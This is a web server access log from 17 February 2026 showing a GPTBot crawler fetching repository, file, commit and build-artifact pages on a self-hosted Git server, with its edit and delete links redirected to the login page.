+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11696] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:16:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:17:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:17:16:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:17:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:17:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 9794] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:17:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:17:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 1135869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:17:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11693] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11689] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fGoldMonitor.spec" [Client 74.7.227.38] [Length 22687] [Gzip 4.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:17:16:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" +[17/Feb/2026:17:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build_exe.py" +[17/Feb/2026:17:16:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:16:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:16:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" +[17/Feb/2026:17:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build_exe.py" +[17/Feb/2026:17:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 874] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 8547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" +[17/Feb/2026:17:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:17:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:17:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 76184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:17:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 874] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:17:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 17783] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json?display=source" [Client 74.7.227.38] [Length 12791] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" +[17/Feb/2026:17:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md?display=rendered" [Client 74.7.227.38] [Length 13577] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" +[17/Feb/2026:17:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/status.json" [Client 74.7.227.38] [Length 11275] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" +[17/Feb/2026:17:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14715] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10053] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" +[17/Feb/2026:17:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10052] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" +[17/Feb/2026:17:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 74.7.227.38] [Length 11088] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14711] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15649] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15647] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:16:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:16:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 9794] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:16:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" +[17/Feb/2026:17:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/status.json" +[17/Feb/2026:17:16:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" +[17/Feb/2026:17:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/status.json" +[17/Feb/2026:17:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9960] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9956] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 10122] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 10118] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10697] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10686] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10307] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10307] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17063] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 